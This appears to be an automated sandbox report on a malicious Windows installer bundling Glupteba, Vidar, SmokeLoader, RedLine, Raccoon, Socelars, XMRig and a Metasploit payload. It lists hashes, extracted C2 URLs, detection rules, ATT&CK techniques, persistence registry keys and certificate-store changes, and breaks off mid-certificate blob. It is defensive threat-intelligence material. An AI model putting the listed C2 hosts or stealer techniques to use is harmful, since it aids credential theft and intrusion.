glupteba | 8485c644c0a96ff0d9256b10e2c50ee462868432080b6f27869d96edf77a7d0e

Resubmissions

13-09-2021 13:00

210913-p826aadfh4 10

12-09-2021 18:18

210912-wxzpcafeel 10

Analysis

max time kernel
1810s
max time network
1794s
platform
windows7_x64
resource
win7-jp
submitted
12-09-2021 18:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup_x86_x64_install.exe
Size

3.4MB
MD5

7279aeead22b91c8176ee932377f2e27
SHA1

169aa33bbaacff9d2b1fbef2a8d06456d14c81dc
SHA256

8485c644c0a96ff0d9256b10e2c50ee462868432080b6f27869d96edf77a7d0e
SHA512

8ddaa2cd804602c0fdde5a85c96067b19338d074980fd0350839e68fea9b113d55af056a3ac3cbb04c47b9ef819c4840031a9fcb817d7a45bb2e35d0184d7697

Malware Config

Extracted

Family

vidar

Version

40.5

Botnet

706

https://gheorghip.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

resource	yara_rule
behavioral1/memory/2996-298-0x0000000000400000-0x0000000001BB7000-memory.dmp	family_glupteba
behavioral1/memory/2996-297-0x0000000003AA0000-0x00000000043BE000-memory.dmp	family_glupteba
behavioral1/memory/3040-358-0x0000000000400000-0x0000000001BB7000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2600	1268	rundll32.exe	9
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2944	1268	rundll32.exe	9

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1580-307-0x000000000041C5E2-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 5 IoCs

resource	yara_rule
behavioral1/files/0x0001000000012f09-114.dat	family_socelars
behavioral1/files/0x0001000000012f09-161.dat	family_socelars
behavioral1/files/0x0001000000012f09-163.dat	family_socelars
behavioral1/files/0x0001000000012f09-171.dat	family_socelars
behavioral1/files/0x0001000000012f09-170.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral1/memory/772-182-0x0000000003170000-0x0000000003241000-memory.dmp	family_vidar
behavioral1/memory/772-183-0x0000000000400000-0x00000000017F4000-memory.dmp	family_vidar

XMRig Miner Payload 1 IoCs

miner

resource	yara_rule
behavioral1/memory/2176-346-0x0000000140000000-0x0000000140763000-memory.dmp	xmrig

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x0001000000012f03-69.dat	aspack_v212_v242
behavioral1/files/0x0001000000012f05-75.dat	aspack_v212_v242
behavioral1/files/0x0001000000012f02-72.dat	aspack_v212_v242
behavioral1/files/0x0001000000012f02-71.dat	aspack_v212_v242
behavioral1/files/0x0001000000012f03-70.dat	aspack_v212_v242
behavioral1/files/0x0001000000012f05-76.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 46 IoCs

pid	Process
1640	setup_installer.exe
1788	setup_install.exe
1872	Sun15d8dfe2c6d17.exe
1408	Sun15223697c98.exe
1732	Sun157ff8e4440aa.exe
608	Sun15b61bf18b0f1.exe
1464	Sun152260a303c33a7.exe
772	Sun150d896340a863.exe
1524	Sun1584240df9fe73a3.exe
2108	Sun157a449716c8ee483.exe
2180	Sun150faeb3537d.exe
2748	LzmwAqmV.exe
2760	853943.exe
2824	8734150.exe
2960	WinHoster.exe
3008	Chrome 5.exe
3052	PublicDwlBrowser1100.exe
2076	2.exe
752	6850068.exe
1120	setup.exe
1064	udptest.exe
2164	setup_2.exe
1700	3002.exe
2276	setup_2.tmp
920	jhuuee.exe
980	3002.exe
1716	8.exe
2636	BearVpn 3.exe
1872	setup_2.exe
2724	8670989.exe
2424	8641602.exe
2108	setup_2.tmp
2512	6321092.exe
2220	1797623.exe
2996	LzmwAqmV.exe
1580	6321092.exe
2400	services64.exe
2552	sihost64.exe
2852	7EA2.exe
2204	3238.exe
3040	LzmwAqmV.exe
336	ishsbjf
1820	7NGb9RsmCw.exe
1392	sihost.exe
1564	ishsbjf
2528	ishsbjf

Loads dropped DLL 64 IoCs

pid	Process
1656	setup_x86_x64_install.exe
1640	setup_installer.exe
1640	setup_installer.exe
1640	setup_installer.exe
1640	setup_installer.exe
1640	setup_installer.exe
1640	setup_installer.exe
1788	setup_install.exe
1788	setup_install.exe
1788	setup_install.exe
1788	setup_install.exe
1788	setup_install.exe
1788	setup_install.exe
1788	setup_install.exe
1788	setup_install.exe
1016	cmd.exe
1056	cmd.exe
1056	cmd.exe
1872	Sun15d8dfe2c6d17.exe
1872	Sun15d8dfe2c6d17.exe
808	cmd.exe
1704	cmd.exe
1552	cmd.exe
692	cmd.exe
316	cmd.exe
316	cmd.exe
940	cmd.exe
940	cmd.exe
772	Sun150d896340a863.exe
772	Sun150d896340a863.exe
2108	Sun157a449716c8ee483.exe
2108	Sun157a449716c8ee483.exe
1820	cmd.exe
2180	Sun150faeb3537d.exe
2180	Sun150faeb3537d.exe
1408	Sun15223697c98.exe
1408	Sun15223697c98.exe
2620	rundll32.exe
2620	rundll32.exe
2620	rundll32.exe
2620	rundll32.exe
2748	LzmwAqmV.exe
2748	LzmwAqmV.exe
2824	8734150.exe
2824	8734150.exe
2824	8734150.exe
2960	WinHoster.exe
2960	WinHoster.exe
2748	LzmwAqmV.exe
2748	LzmwAqmV.exe
2748	LzmwAqmV.exe
2748	LzmwAqmV.exe
752	6850068.exe
752	6850068.exe
2748	LzmwAqmV.exe
2748	LzmwAqmV.exe
1120	setup.exe
2748	LzmwAqmV.exe
772	Sun150d896340a863.exe
2164	setup_2.exe
2164	setup_2.exe
2748	LzmwAqmV.exe
2748	LzmwAqmV.exe
772	Sun150d896340a863.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	8734150.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ip-api.com

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2512 set thread context of 1580	2512	6321092.exe	96
PID 2400 set thread context of 2176	2400	services64.exe	114

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\FarLabUninstaller\is-OEIBC.tmp	setup_2.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
2516	1716	WerFault.exe	78
2012	2512	WerFault.exe	83
2580	2760	WerFault.exe	57
316	2724	WerFault.exe	82
2600	752	WerFault.exe	68

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun15223697c98.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun15223697c98.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ishsbjf
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ishsbjf
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ishsbjf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun15223697c98.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ishsbjf
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ishsbjf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ishsbjf

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Sun150d896340a863.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Sun150d896340a863.exe

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3012	schtasks.exe
1004	schtasks.exe
1868	schtasks.exe
2208	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1116	timeout.exe
2396	timeout.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
2924	taskkill.exe
2904	taskkill.exe
2264	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	LzmwAqmV.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Sun150faeb3537d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sun150d896340a863.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5